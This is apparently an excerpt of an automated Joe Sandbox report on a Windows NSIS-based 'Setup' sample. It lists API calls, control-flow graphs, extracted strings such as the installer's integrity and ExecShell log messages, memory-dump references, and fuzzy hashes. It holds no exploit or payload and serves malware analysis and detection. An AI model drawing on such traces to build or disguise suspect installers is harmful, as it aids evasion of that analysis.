• SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
• GetDlgItem.USER32(?,00000003), ref: 00405734
• ShowWindow.USER32(00000000,?), ref: 00405756
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
• EnableWindow.USER32(?,?), ref: 00405783
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
• EnableMenuItem.USER32(00000000), ref: 004057A0
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
• lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
• SetWindowTextW.USER32(?,00451D98), ref: 00405808
• ShowWindow.USER32(?,0000000A), ref: 0040593C
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3282139019-0
                                                                                                                                                                        • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                        • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                        • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                        • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Control-flow Graph

control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
APIs
  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
• lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
• lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
• lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
• GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
• RegisterClassW.USER32(00476A40), ref: 00405B36
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
• CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
• ShowWindow.USER32(00000005,00000000), ref: 00405BBD
• LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
• LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
• GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
• GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
• RegisterClassW.USER32(00476A40), ref: 00405BFF
• DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
• String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
• API String ID: 608394941-2746725676
• Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
• Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
• Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
• Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Control-flow Graph

APIs
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• lstrcatW.KERNEL32(00000000,00000000,CanPoland,004D70B0,00000000,00000000), ref: 00401A76
• CompareFileTime.KERNEL32(-00000014,?,CanPoland,CanPoland,00000000,00000000,CanPoland,004D70B0,00000000,00000000), ref: 00401AA0
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
• String ID: CanPoland$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
• API String ID: 4286501637-3376295515
• Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
• Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
• Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
• Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Control-flow Graph

control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
APIs
• GetTickCount.KERNEL32 ref: 004035C4
• GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
• GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
Strings
• Inst, xrefs: 00403698
• Error launching installer, xrefs: 00403603
• Null, xrefs: 004036AA
• soft, xrefs: 004036A1
• Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                        • API String ID: 4283519449-527102705
                                                                                                                                                                        • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                        • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                        • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00424179,00403792,00000000), ref: 004034FF
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                        • String ID: (]C$... %d%%$pAB$yAB
                                                                                                                                                                        • API String ID: 651206458-2023174797
                                                                                                                                                                        • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                        • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                        • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                        • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                        • lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                        • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                        • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2740478559-0
                                                                                                                                                                        • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                        • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                        • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                        • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                        • String ID: <RM>$CanPoland$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                        • API String ID: 247603264-2569684089
                                                                                                                                                                        • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                        • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                        • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                        • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
APIs
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
• ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
• ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
• ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
• String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
• API String ID: 3156913733-2180253247
